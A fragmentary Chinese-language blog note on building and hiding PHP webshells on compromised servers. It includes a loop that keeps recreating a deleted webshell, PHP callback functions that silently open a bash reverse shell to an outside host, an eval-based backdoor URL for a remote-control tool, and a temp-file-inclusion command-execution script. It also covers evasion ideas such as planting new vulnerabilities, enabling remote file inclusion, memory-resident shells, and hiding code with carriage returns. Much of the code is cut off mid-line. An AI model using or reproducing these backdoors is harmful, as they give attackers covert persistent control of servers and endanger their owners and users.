一 . WebShell 驻留内存 , 轮询并自动创建
';
while(true) {
if(!file_exists($file)) {
file_put_contents($file, $code);
}
usleep(50);
}
?>
二 . 很隐蔽的 webshell
三 . 使用回调函数
1. ob_start
# 自动触发
& /dev/tcp/8.8.8.8/8888 0>&1"');}ob_start("a");?>
2. header_register_callback
# 自动触发
& /dev/tcp/8.8.8.8/8888 0>&1"');}header_register_callback('a');?>
3. filter_input
# 需要 POST 一个 C 参数 , 就会触发反弹 shell
& /dev/tcp/8.8.8.8/8888 0>&1"');}filter_input(INPUT_POST, 'c', FILTER_CALLBACK, array('options' => 'a'));?>
# 直接菜刀连接 , 密码为 c
http://127.0.0.1/index.php?&c=assert&d=eval($_POST['c'])
'a'));?>
4. 类似的函数还有 :
filter_var() - Filters a variable with a specified filter
filter_input_array() - Gets external variables and optionally filters them
filter_var_array() - Gets multiple variables and optionally filters them
5. stream_wrapper_register
6. 通过构造上述的webshell
其实发现了一些思路关于如何隐藏 WebShell
当我们已经得到一个已知的 webshell 以后
我认为最好的 webshell 就是将 webshell 隐藏在目标服务器的正常代码逻辑中
例如 :
1. 为某类添加魔术函数 (但是需要保证这个函数可以被我们触发)
2. 构造一个新的漏洞 , 别人比较难以发现 , 但是我们可以很容易就可以触发
3. 修改 php 配置文件 , 开启远程文件包含等比较危险的配置 (这样 webshell 并不需要保存在目标硬盘上 , 直接发送请求即可动态调用)
4. 挂上内存马
5. ... 待整理
障眼法 :
\r 为ASCII控制字符
如果一个文件中存在控制字符 \r
那么如果在终端中 cat 的时候就会控制光标移动到行首
例如 :
image.png
image.png
文件包含法 :
通过包含上传的临时文件
服务器在处理上传文件的时序关系如下图 :
image.png
webshell如下 :
测试 :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
url = "http://127.0.0.1/index.php?c=system('id');"
files = {'file': ('filename.php', '', 'image/jpeg')}
response = requests.post(url, files=files)
content = response.content
print content
image.png
发一波过狗截图 :
image.png
image.png